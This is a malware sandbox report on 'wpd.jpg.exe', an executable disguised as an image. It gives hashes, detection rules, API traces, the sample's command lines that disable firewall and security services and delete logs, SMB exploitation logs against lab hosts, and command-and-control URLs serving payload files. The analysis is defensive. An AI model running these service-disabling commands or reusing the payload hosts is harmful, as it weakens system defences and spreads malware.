Summary | ZeroBOX
Gen1 Generic Malware Malicious Library Downloader task schedule UPX HTTP DNS ScreenShot Create Service KeyLogger Internet API DGA Hijack Network Http API persistence FTP Socket Escalate priviledges Code injection PWS Sniff Audio Steal credential P2P
Category Machine Started Completed
ARCHIVE s1_win7_x6403_us June 7, 2024, 5:50 p.m. June 7, 2024, 5:52 p.m.

Archive wpd.jpg.exe @ sandbox.zip

Summary

Size 8.4MB
Type PE32 executable (console) Intel 80386, for MS Windows
MD5 1bfe19a314dd31d6adda302f177c3b7c
SHA1 37fd59aa2c2b77c8757438075138f11eaedf81b8
SHA256 b63ce450e4d34d1cdd727a1a246d38167f45aeacc69d15c6922ef723e49a3cf7
SHA512 b486b312f809146fbe95f121ea9d7bfc152266e5ca1a178316aafe4ca21e4a80ffa76b5c7e36758d45714439b34f7f6fa6d3ed2a599f64fd7dfe5a23d416a638
CRC32 CD831527
ssdeep 196608:1M6/uTeIz//QEJZe+t6SuqYTFLQmEe2r06+mVWFO5p5adyuFqAHBLgMP:l/YeIzAYe+t1uTJQddQ3Qub
Yara
  • Network_Downloader - File Downloader
  • PE_Header_Zero - PE File Signature
  • IsPE32 - (no description)

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
104.37.187.182 Active Moloch
139.5.177.32 Active Moloch
164.124.101.2 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

WriteConsoleA

buffer: get url: 104.37.187.182 success
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: ERROR: The process "csrs.exe" not found.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: [SC] StartService FAILED 1056: An instance of the service is already running.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: [SC] ChangeServiceConfig SUCCESS
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: [SC] StartService FAILED 1056: An instance of the service is already running.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: [SC] ChangeServiceConfig SUCCESS
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: 'sc1' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: The service name is invalid.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: More help is available by typing NET HELPMSG 2185.
console_handle: 0x0000000b
1 1 0

WriteConsoleW

buffer: [SC] OpenService FAILED 1060: The specified service does not exist as an installed service.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: [SC] OpenService FAILED 1060: The specified service does not exist as an installed service.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: [SC] OpenService FAILED 1060: The specified service does not exist as an installed service.
console_handle: 0x00000007
1 1 0

WriteConsoleW

buffer: ERROR: The process "csrs.exe" not found.
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-07 21:52:06,351 - DEBUG -
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-07 21:52:06,351 - INFO - **************** ***mode:6*** ***addr:*** ***port:445*** ***addrs:*** ***user:*** ***user file path:*** ***pwd:*** ***pwds:*** ***threads:200*** ***cmd:*** ***batch file:*** ***listen port:9999*** ***************
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-07 21:52:06,367 - INFO - parser user pwd dic...
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-07 21:52:06,367 - INFO - start attack...
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-07 21:52:06,367 - DEBUG - mixedAttack...
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: ecv total length: 8
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: r
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: ecv empty data,break!
console_handle: 0x00000007
1 1 0

WriteConsoleA

buffer: 024-06-07 21:52:07,180 - INFO - blue attack target:192.168.56.103
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-07 21:52:07,180 - INFO - blue attack target:192.168.56.101
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-07 21:52:07,180 - INFO - check target:192.168.56.103 user: pwd:
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-07 21:52:07,180 - INFO - check target:192.168.56.101 user: pwd:
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-07 21:52:07,210 - INFO - 192.168.56.103 OS:Windows 7 Professional N 7601 Service Pack 1
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-07 21:52:07,226 - INFO - 192.168.56.103 is not patched
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-07 21:52:07,226 - INFO - spoolss: STATUS_ACCESS_DENIED
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-07 21:52:07,226 - INFO - samr: STATUS_ACCESS_DENIED
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-07 21:52:07,242 - INFO - netlogon: STATUS_ACCESS_DENIED
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-07 21:52:07,242 - INFO - lsarpc: STATUS_ACCESS_DENIED
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-07 21:52:07,257 - INFO - browser: STATUS_ACCESS_DENIED
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-07 21:52:07,257 - DEBUG - Target OS: Windows 7 Professional N 7601 Service Pack 1
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-07 21:52:07,289 - DEBUG - SMB1 session setup allocate nonpaged pool success
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-07 21:52:07,305 - DEBUG - SMB1 session setup allocate nonpaged pool success
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-07 21:52:07,305 - DEBUG - good response status: INVALID_PARAMETER
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-07 21:52:07,319 - INFO - blueAttack is finished!
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-07 21:52:07,492 - INFO - exploit attack target:192.168.56.103 user: pwd:
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-07 21:52:07,492 - INFO - exploitrth:0 started!
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-07 21:52:07,507 - INFO - exploitrth:1 started!
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-07 21:52:07,507 - INFO - exploit attack target:192.168.56.101 user: pwd:
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-07 21:52:07,523 - INFO - exploitrth:2 started!
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-07 21:52:07,523 - INFO - 192.168.56.103: Target OS: Windows 7 Professional N 7601 Service Pack 1
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-07 21:52:07,523 - INFO - exploitrth:3 started!
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-07 21:52:07,539 - INFO - exploitrth:4 started!
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-07 21:52:07,555 - DEBUG - 192.168.56.103 Not found accessible named pipe
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-07 21:52:07,555 - INFO - Failure::exploit attack target:192.168.56.103 user: pwd:
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-07 21:52:07,555 - INFO - exploitrth:5 started!
console_handle: 0x0000000b
1 1 0

WriteConsoleA

buffer: 024-06-07 21:52:07,555 - INFO - exploitrth:6 started!
console_handle: 0x0000000b
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
section xx0
section xx1
section xx2
resource name BIN
resource name TXT
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
wpd+0xb87553 @ 0xf87553
0x246

exception.instruction_r: 90 57 9c bf ad ba ac e1 66 f7 d7 66 f7 d7 66 81
exception.symbol: wpd+0xa66c71
exception.instruction: nop
exception.module: wpd.jpg.exe
exception.exception_code: 0x80000004
exception.offset: 10906737
exception.address: 0xe66c71
registers.esp: 849776
registers.edi: 15459136
registers.eax: 2716614981
registers.ebp: 851808
registers.edx: 79
registers.ebx: 4194304
registers.esi: 0
registers.ecx: 838
1 0 0
Time & API Arguments Status Return Repeated

bind

ip_address: 0.0.0.0
socket: 948
port: 0
1 0 0

bind

ip_address:
socket: 436
port: 0
1 0 0

bind

ip_address: 0.0.0.0
socket: 500
port: 9999
1 0 0

listen

socket: 500
backlog: 5
1 0 0

accept

ip_address: 127.0.0.1
socket: 500
port: 49838
1 516 0
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://104.37.187.182/xpxmr.txt
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://104.37.187.182/ok/wpd.html
suspicious_features Connection to IP address suspicious_request GET http://104.37.187.182/wpdmd5.txt
suspicious_features Connection to IP address suspicious_request GET http://104.37.187.182/wpdtest.txt
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://104.37.187.182/ver.txt
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://104.37.187.182/shellver.txt
request GET http://104.37.187.182/xpxmr.txt
request GET http://104.37.187.182/ok/wpd.html
request GET http://104.37.187.182/wpdmd5.txt
request GET http://104.37.187.182/wpdtest.txt
request GET http://104.37.187.182/ver.txt
request GET http://104.37.187.182/shellver.txt
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2076
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02c10000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 3756
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00670000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
name BIN language LANG_CHINESE filetype empty sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00e90a5c size 0x0001e059
name TXT language LANG_CHINESE filetype empty sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00eaeab8 size 0x0008d49b
name RT_STRING language LANG_CHINESE filetype empty sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00f3bf54 size 0x00000038
name RT_VERSION language LANG_CHINESE filetype COM executable for DOS sublanguage SUBLANG_CHINESE_SIMPLIFIED offset 0x00e0c350 size 0x000002b8
file C:\Users\test22\AppData\Local\Temp\_MEI37122\python27.dll
file C:\Users\test22\AppData\Local\Temp\_MEI37122\msvcp90.dll
file C:\Users\test22\AppData\Local\Temp\_MEI37122\msvcr90.dll
file C:\Users\test22\AppData\Local\Temp\_MEI37122\msvcm90.dll
cmdline C:\Windows\system32\cmd.exe /c taskkill /im csrs.exe /f
cmdline C:\Windows\system32\cmd.exe /c net stop WinNsaSrv&sc config WinNsaSrv start= disabled&sc1 stop sharedaccess&sc stop 1MpsSvc&sc config 1MpsSvc start= disabled&del *.log
cmdline C:\Windows\system32\cmd.exe /c taskkill /f /im csrs.exe&sc start netprofm&sc config netprofm start= auto&sc start NlaSvc&sc config NlaSvc start= auto
file C:\Users\test22\AppData\Local\Temp\_MEI37122\Crypto.Util._counter.pyd
file C:\Users\test22\AppData\Local\Temp\_MEI37122\Crypto.Cipher._DES3.pyd
file C:\Users\test22\AppData\Local\Temp\_MEI37122\_hashlib.pyd
file C:\Users\test22\AppData\Local\Temp\_MEI37122\cryptography.hazmat.bindings._constant_time.pyd
file C:\Users\test22\AppData\Local\Temp\_MEI37122\msvcr90.dll
file C:\Users\test22\AppData\Local\Temp\_MEI37122\_socket.pyd
file C:\Users\test22\AppData\Local\Temp\_MEI37122\select.pyd
file C:\Users\test22\AppData\Local\Temp\_MEI37122\Crypto.Hash._MD4.pyd
file C:\Users\test22\AppData\Local\Temp\_MEI37122\python27.dll
file C:\Users\test22\AppData\Local\Temp\_MEI37122\msvcm90.dll
file C:\Users\test22\AppData\Local\Temp\_MEI37122\msvcp90.dll
file C:\Users\test22\AppData\Local\Temp\_MEI37122\_ssl.pyd
file C:\Users\test22\AppData\Local\Temp\_MEI37122\Crypto.Cipher._DES.pyd
file C:\Users\test22\AppData\Local\Temp\_MEI37122\_cffi_backend.pyd
file C:\Users\test22\AppData\Local\Temp\_MEI37122\Crypto.Random.OSRNG.winrandom.pyd
file C:\Users\test22\AppData\Local\Temp\_MEI37122\pyexpat.pyd
file C:\Users\test22\AppData\Local\Temp\_MEI37122\Crypto.Util.strxor.pyd
file C:\Users\test22\AppData\Local\Temp\_MEI37122\cryptography.hazmat.bindings._openssl.pyd
file C:\Users\test22\AppData\Local\Temp\_MEI37122\Crypto.Cipher._AES.pyd
file C:\Users\test22\AppData\Local\Temp\_MEI37122\Crypto.Hash._SHA256.pyd
file C:\Users\test22\AppData\Local\Temp\_MEI37122\Crypto.Cipher._ARC4.pyd
file C:\Users\test22\AppData\Local\Temp\_MEI37122\bz2.pyd
file C:\Users\test22\AppData\Local\Temp\_MEI37122\_ctypes.pyd
file C:\Users\test22\AppData\Local\Temp\_MEI37122\unicodedata.pyd
wmi SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "csrs.exe")
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2076
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x02c10000
process_handle: 0xffffffff
1 0 0
section {u'size_of_data': u'0x0085f400', u'virtual_address': u'0x005ac000', u'entropy': 7.92303226230594, u'name': u'xx2', u'virtual_size': u'0x0085f2c0'} entropy 7.92303226231 description A section with a high entropy has been found
entropy 0.99953363647 description Overall entropy of this PE file is high
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description Create a windows service rule Create_Service
description Communications over RAW Socket rule Network_TCP_Socket
description Communication using DGA rule Network_DGA
description Match Windows Http API call rule Str_Win32_Http_API
description Take ScreenShot rule ScreenShot
description Escalate priviledges rule Escalate_priviledges
description Steal credential rule local_credential_Steal
description task schedule rule schtasks_Zero
description PWS Memory rule Generic_PWS_Memory_Zero
description Hijack network configuration rule Hijack_Network
description Record Audio rule Sniff_Audio
description Communications over HTTP rule Network_HTTP
description Communications use DNS rule Network_DNS
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Possibly employs anti-virtualization techniques rule vmdetect
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description File Downloader rule Network_Downloader
description Match Windows Inet API call rule Str_Win32_Internet_API
description Install itself for autorun at Windows startup rule Persistence
description Communications over FTP rule Network_FTP
description Run a KeyLogger rule KeyLogger
description Communications over P2P network rule Network_P2P_Win
cmdline C:\Windows\system32\cmd.exe /c taskkill /im csrs.exe /f
cmdline sc start NlaSvc
cmdline taskkill /f /im csrs.exe
cmdline sc config NlaSvc start= auto
cmdline sc start netprofm
cmdline sc stop 1MpsSvc
cmdline taskkill /im csrs.exe /f
cmdline C:\Windows\system32\cmd.exe /c net stop WinNsaSrv&sc config WinNsaSrv start= disabled&sc1 stop sharedaccess&sc stop 1MpsSvc&sc config 1MpsSvc start= disabled&del *.log
cmdline sc config 1MpsSvc start= disabled
cmdline C:\Windows\system32\cmd.exe /c taskkill /f /im csrs.exe&sc start netprofm&sc config netprofm start= auto&sc start NlaSvc&sc config NlaSvc start= auto
cmdline sc config netprofm start= auto
cmdline sc config WinNsaSrv start= disabled
cmdline net stop WinNsaSrv
host 104.37.187.182
host 139.5.177.32
description wpd.jpg.exe tried to sleep 207 seconds, actually delayed analysis time by 207 seconds
description csrs.exe tried to sleep 1750 seconds, actually delayed analysis time by 1750 seconds
url http://175.208.134.150:8282/test/test.eml
url http://104.37.187.182/ok/wpd.html
url http://175.208.134.150:8282/favicon.ico
url http://123.123.123.123
url http://192.168.3.119/
url http://104.37.187.182/wpdmd5.txt
url http://175.208.134.150:8282/test/exe1.zip
url http://123.123.123.123:54321/dlr.arm
url https://192.168.3.119/
url http://139.5.177.32:9999/
url http://185.47.128.124:8124/m17010.txt
url http://139.5.177.32:9999
dead_host 139.5.177.32:9999
dead_host 192.168.56.1:445
dead_host 192.168.56.103:49232
dead_host 192.168.56.103:49290
dead_host 192.168.56.101:445
dead_host 192.168.56.1:1433
dead_host 192.168.56.101:1433
dead_host 192.168.56.103:49432